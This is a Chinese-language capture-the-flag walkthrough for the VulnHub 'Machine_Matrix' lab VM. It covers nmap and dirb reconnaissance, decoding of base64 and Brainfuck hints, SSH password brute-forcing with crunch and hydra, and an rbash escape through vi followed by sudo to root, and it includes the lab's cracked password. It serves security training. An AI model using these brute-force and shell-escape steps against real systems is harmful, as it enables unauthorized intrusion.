Machine_Matrix打靶渗透【附代码】(权限提升)
靶机下载地址:
https%3A%2F%2Fdownload.vulnhub.com%2Fmatrix%2FMachine_Matrix.zip
1. 主机发现+端口扫描+目录扫描+敏感信息获取
1.1. 主机发现
nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:D9:36:81'
1.2. 端口扫描
nmap -p- 192.168.7.155
1.3. 目录扫描
dirb http://192.168.7.155
1.4. 敏感信息获取
whatweb http://192.168.7.155
2. WEB打点尝试寻找漏洞点
2.1. 进入80端口主页面
1.老规矩,点点功能模块,看看有能利用的点吗 -> 网页提示跟随白兔
2.右键点击兔子 -> 新建标签页打开 -> 有一个图片路径
url提示port:31337端口,拼接访问 -> 无果
3.查看网页源码,给了一段base64加密值
ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=
解码得下文,大意为输出一段内容至Cypher.matrix文件中
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
拼接Cypher.matrix试试,直接下载下来了这个文件,文本方式打开看看
熟悉的Brainfuck加密,找工具解密一下
You can enter into matrix as guest, with password k1ll0rXX
# 您可以以访客身份进入矩阵,密码为k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
# 事实上,我忘记了最后两个字符,所以我用XX代替了。试试你的运气,找到正确的密码字符串。
2.2. GetShell
1.根据他的提示密码是不完整的,使用kali中crunch
工具生成字典,暴力破解
crunch 8 8 -t k1ll0r%@ -o passwd.txt
2.使用 hydra 工具进行爆破,得到账号密码【k1ll0r7n】
hydra -l guest -P passwd.txt ssh://192.168.7.155
3.尝试ssh进行连接,连接成功
ssh guest@192.168.7.155
3. 权限提升
3.1. 老规矩看执行命令权限
sudo -l
很多命令受限
export #查看环境变量
# /bin/rbash权限受限制
# 发现vi命令可以使用,vi绕过rbash
vi
# 输入'冒号'
!/bin/bash
发现还是无法执行一些命令 -> 命令可正常执行 -> 执行以下命令,配置环境变量绕过
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
sudo su # 密码k1ll0r7n